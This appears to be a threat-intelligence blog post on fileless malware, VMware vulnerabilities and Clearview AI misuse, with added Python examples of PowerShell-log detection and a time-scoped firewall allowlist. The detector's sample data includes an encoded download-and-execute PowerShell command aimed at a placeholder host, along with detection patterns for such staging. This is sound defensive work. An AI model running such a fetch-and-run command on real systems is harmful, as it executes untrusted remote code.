Malware Trends: Responding to Fileless Malware Requires Forward Leaning Vulnerability Management
It appears 2022 is the year fileless malware becomes a more frequent threat. A fileless malware attack is a technique threat actors use to inject malicious code directly into the memory of a mobile device or computer rather than dropping a malicious file on the device’s disk. All operating systems are vulnerable to these attacks; common TTPs include Vermillion for Linux, Cobalt Strike for Windows, and the Lazarus Group for MacOS (2, 4). These attacks currently rely on social engineering to compromise a system: phishing messages containing malicious links the user needs to click, mobile text messages, or phone calls directing the user to a malicious site that steals credentials (2, 6). Once the user activates the link, the process uses Flash or equivalent software to open Windows PowerShell and run commands in memory that inject a payload instructing the device to carry out malicious behavior such as data exfiltration, or to run malicious scripts from a botnet (3). Fileless malware is the least detectable because it contains no identifiable signature or behavior and leaves no files to scan, since it relies on memory, and it can coexist with ransomware such as Ryuk or Conti (4, 5). Typical detection methods, for this reason, will not be successful.
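As an added illustration (not code from the original post or from EclecticIQ), the following Python script shows the kind of behavior-based check a defender can run where file-signature scanning falls short: it reads PowerShell script block log records (the shape of Windows Event ID 4104 ScriptBlockText), decodes any -EncodedCommand argument the way PowerShell does (base64 over UTF-16LE), and scores indicators of in-memory staging such as Invoke-Expression, remote fetch via WebClient and reflective assembly loading. The log records, host names, indicator weights and threshold are constructed for the example; the URL uses the reserved .invalid domain as a placeholder.

```python
import base64
import binascii
import re
from typing import Optional


def _b64_utf16(text: str) -> str:
    """Encode text the way PowerShell's -EncodedCommand expects (base64 over UTF-16LE)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample records shaped like Event ID 4104 ScriptBlockText; none come from a real host.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-01", "ScriptBlockText": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"id": 2, "host": "ws-02", "ScriptBlockText":
        "powershell.exe -nop -w hidden -enc "
        + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"id": 3, "host": "ws-03", "ScriptBlockText":
        "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))"},
    {"id": 4, "host": "ws-04", "ScriptBlockText": "Import-Module ActiveDirectory; Get-ADUser -Filter *"},
]

# Behaviours that indicate code is staged or executed in memory rather than written to disk.
# Weights are an editorial choice for this example, not a vendor or community standard.
INDICATORS = {
    r"\bIEX\b|Invoke-Expression": ("invoke-expression", 3),
    r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest": ("remote-fetch", 3),
    r"Reflection\.Assembly\]::Load": ("reflective-load", 4),
    r"FromBase64String": ("base64-decode", 2),
    r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b": ("hidden-or-noprofile", 1),
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded payload of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENC_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_script_block(text: str):
    """Score one script block; a decoded -EncodedCommand payload is scanned as well."""
    hits = []
    score = 0
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded-command")
        score += 2
    for pattern, (label, weight) in INDICATORS.items():
        # Each indicator counts once, whether it appears in the raw or the decoded text.
        for candidate in (text, decoded or ""):
            if re.search(pattern, candidate, re.IGNORECASE):
                hits.append(label)
                score += weight
                break
    return score, hits


def triage(events, threshold: int = 4):
    """Return the events whose in-memory-execution score reaches the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_script_block(ev["ScriptBlockText"])
        if score >= threshold:
            flagged.append({"id": ev["id"], "host": ev["host"], "score": score, "hits": hits})
    return flagged


if __name__ == "__main__":
    for item in triage(SAMPLE_EVENTS):
        print(f"event {item['id']} on {item['host']}: score {item['score']} {item['hits']}")
```

Script block logging has to be enabled on the endpoint for records like these to exist at all, which is the operational point: the payload never touches disk, but the interpreter that runs it can still be made to record what it executed. The threshold and weights are tuning knobs, and benign administration scripts (event 4 above) should score zero.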
Fileless malware cannot infect a device without exploiting a vulnerability to obtain administrative privileges in an operating system tool like PowerShell (22, 23). A “perfect” patch management program would be the optimal solution, but EIQ intelligence analysts consider it unlikely to be a realistic one. The first step in protecting against fileless malware is visibility into the operating environment: a thorough understanding of the corporate network, how it connects to personal and corporate mobile devices, and what opportunities for segmentation exist to block critical pathways into high-value assets. Prioritizing key environmental infrastructures, such as those created by VMware, Azure, or AWS, is ideal, as vulnerabilities are now exploited more frequently than just on the day after Microsoft's “Patch Tuesday”. Ransomware and other destructive malware types can take over a system in just a few minutes, as observed by EclecticIQ analysts (1, 5).
Critical Vulnerabilities: VMware and Frequently Exploited Applications
Software company VMware announced the existence of critical vulnerabilities tracked as CVE-2022-22954 and CVE-2022-22960 on April 6, 2022 (10). The company also released an emergency directive for these vulnerabilities and for CVE-2022-22972 and CVE-2022-22973, which VMware disclosed on May 18, 2022 (11). These four vulnerabilities, when exploited together, allow total system control of a victim’s machine, including any connected network, opening the door to dropping malware such as spyware or ransomware, to data exfiltration, or to other malicious software taking advantage of the network (11, 12, 13).
Broadcom’s attempted takeover of VMware casts uncertainty over how VMware will handle these vulnerabilities in the future. On May 22nd, the company took over the majority shares in a $61 billion buyout bid (14). VMware still has the option to choose another buyer, but it would have to buy out $1.6 billion worth of Broadcom stock to do so (14). The relevance here is that the potential takeover creates uncertainty about the consistency of VMware product updates once the company is bought out, and about whether critical vulnerabilities would be allowed to persist or go undetected (13).
The emergency directive described above urges network defenders to reassess current security measures for environments running VMware, because threat actors can swiftly reverse engineer VMware updates and turn them into new exploits, making working exploits available almost immediately (8-13). Analysts at EclecticIQ recommend identifying and assessing the criticality of externally facing network routes in environments running VMware software, and redesigning a more isolated environment through segmentation and enabling multifactor authentication wherever possible. Analysts also recommend incorporating rulesets in firewalls and endpoint solutions that only allow known behavior involving VMware to occur within a specified period corresponding to normal operations in each company's specific environment.
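The time-bounded allowlist recommended above, as an added example that is not from the original post or from EclecticIQ: a default-deny rule set keyed on source zone, destination zone and destination port, where each rule also carries the local time window in which that behavior is expected, including windows that cross midnight. Zone names, ports, windows and the sample flows are assumed for illustration; a real deployment would express the same rules in the firewall's or EDR product's own policy language and feed it real flow records.

```python
from dataclasses import dataclass
from datetime import datetime, time
from typing import List, Tuple


@dataclass(frozen=True)
class AllowRule:
    """One piece of known-good behavior: who may talk to the VMware management zone, on which port, when."""
    src_zone: str
    dst_zone: str
    dst_port: int
    start: time   # inclusive local start of the window
    end: time     # exclusive end; may be earlier than start when the window wraps past midnight

    def in_window(self, t: time) -> bool:
        if self.start <= self.end:
            return self.start <= t < self.end
        return t >= self.start or t < self.end  # wraps past midnight


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src_zone: str
    dst_zone: str
    dst_port: int


# Assumed rules for the example. Anything not listed here is denied, including any
# flow whose source zone is the internet, which is the externally facing route the text warns about.
RULES = [
    AllowRule("admin-jump", "vmware-mgmt", 443, time(8), time(18)),  # web console, business hours only
    AllowRule("patch-orch", "vmware-mgmt", 22, time(1), time(4)),    # SSH only during the overnight patch window
    AllowRule("backup", "vmware-mgmt", 902, time(22), time(3)),      # backup traffic, window wraps midnight
]


def evaluate(flow: Flow, rules: List[AllowRule] = RULES) -> Tuple[str, str]:
    """Return ("allow"|"deny", reason) for one observed flow under a default-deny policy."""
    for r in rules:
        if (r.src_zone, r.dst_zone, r.dst_port) == (flow.src_zone, flow.dst_zone, flow.dst_port):
            if r.in_window(flow.ts.time()):
                return "allow", f"matched {r.src_zone}->{r.dst_zone}:{r.dst_port} inside window"
            return "deny", "known tuple but outside its allowed window"
    return "deny", "no rule for this zone/port tuple (default deny)"


def review(flows: List[Flow], rules: List[AllowRule] = RULES) -> List[Tuple[str, str, str]]:
    """Evaluate a batch of flows; returns (timestamp, decision, reason) per flow."""
    results = []
    for f in flows:
        decision, reason = evaluate(f, rules)
        results.append((f.ts.isoformat(), decision, reason))
    return results


# Constructed sample flows; none come from a real network.
SAMPLE_FLOWS = [
    Flow(datetime(2022, 6, 1, 10, 15), "admin-jump", "vmware-mgmt", 443),  # in hours -> allow
    Flow(datetime(2022, 6, 1, 23, 40), "admin-jump", "vmware-mgmt", 443),  # after hours -> deny
    Flow(datetime(2022, 6, 2, 1, 30), "backup", "vmware-mgmt", 902),       # inside wrapped window -> allow
    Flow(datetime(2022, 6, 1, 14, 0), "internet", "vmware-mgmt", 443),     # no rule -> deny
    Flow(datetime(2022, 6, 1, 2, 0), "patch-orch", "vmware-mgmt", 22),     # patch window -> allow
]

if __name__ == "__main__":
    for ts, decision, reason in review(SAMPLE_FLOWS):
        print(f"{ts} {decision:5} {reason}")
```

The denials of the second and fourth flows are the ones worth alerting on: a console login at 23:40 from an otherwise trusted jump host, and any reach into the management zone from the internet, are exactly the deviations from known behavior that a time-scoped allowlist surfaces and that a port-only rule would pass.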
New and Noteworthy: AI Facial Recognition Used in Ukraine/Russia War
In late March, researchers discovered that the Ukrainian IT Army uses Clearview AI facial recognition in psychological warfare to identify fallen soldiers and send death notifications to their families (15, 16). On May 17th, the CEO of Clearview AI, Hoan Ton-That, gave an interview addressing this controversial use of the software, in which he mentioned the company's current goal of obtaining 100 billion facial images for inclusion in the database this year (19). The CEO claims this technology dissuades terrorism and other violent acts by quickly attributing those physical crimes to individuals (19, 20). Since the onset of the Russian invasion, three hundred forty officials in the Ukrainian government have received free access to this tool, not counting the unauthorized use by the Ukrainian IT Army (16, 17).
Researchers at EIQ examined the malware trends for 2022, which included an increase in the number of malware families capable of data manipulation, including Remote Access Trojans, worms, rootkits, and fileless malware. EIQ analysts examined the risks of this new AI software and note that this technology is vulnerable to data manipulation malware. These types of malware can export, change, or add data that can be used to falsely incriminate or incorrectly identify an individual. Clearview AI, for example, collects photos and assumes the descriptions attached to them are accurate when confirming identity claims; a photograph uploaded with the description “Russian soldier” will identify that person as a Russian soldier, even if the person is not in the military and has no actual Russian ties (19). WannaCry and the SolarWinds incident are examples of how threat actors can achieve privilege escalation and manipulate the integrity of data, allowing for false accusations, replacements, or deletion of specific individuals. The CEO has not spoken on any plan to counter these capabilities, nor addressed the privacy concerns regarding state and country laws.
Find the Analyst Prompt and earlier editions in our public TAXII collection for easy use in your security stack.
TAXII v1 Discovery services: https://cti.eclecticiq.com/taxii/discovery
You may also download the content as eiq_json, stix1_2, stix2_1.
Please refer to our support page for guidance on how to access the feeds.
About EclecticIQ Threat Research
EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Headquartered in Amsterdam, the EclecticIQ Threat Research team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.
We would love to hear from you. Please send us your feedback by emailing us at email@example.com or fill in the EclecticIQ Audience Interest Survey to drive our research towards your priority area.